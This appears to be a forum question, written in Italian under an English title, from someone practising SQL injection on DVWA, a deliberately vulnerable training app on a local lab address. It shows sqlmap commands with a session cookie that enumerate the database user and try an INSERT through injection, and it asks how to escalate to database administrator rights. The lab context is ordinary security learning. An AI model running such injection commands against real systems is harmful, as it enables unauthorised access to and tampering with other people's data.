How to make sqlmap obtain administrator rights for database?
Sto usando sqlmap per sfruttare i database in un progetto DVWA.
Tuttavia, dopo aver sfruttato il database, ho eseguito il seguente comando per imparare che l'utente è dvwa @%:
sqlmap -u "http://192.168.71.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" -p id --cookie="security=low; PHPSESSID=kikm4b9s9tdk5kq21cs20jt9j1;" --current-user
Sto provando a INSERT
qualcosa nelle tabelle, con questi comandi:
sqlmap -u "http://192.168.71.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" -p id --cookie="security=low; PHPSESSID=kikm4b9s9tdk5kq21cs20jt9j1;" --sql-query="INSERT INTO guestbook (comment,name) VALUES ('foo','bar');"
Tuttavia, questo fallisce, anche se una dichiarazione SELECT
di base funziona bene.
Suppongo che l'utente dvwa @% non abbia privilegi su INSERT/UPDATE
.
È possibile che sqlmap ottenga automaticamente i privilegi di amministratore per il database (in questo caso DVWA)?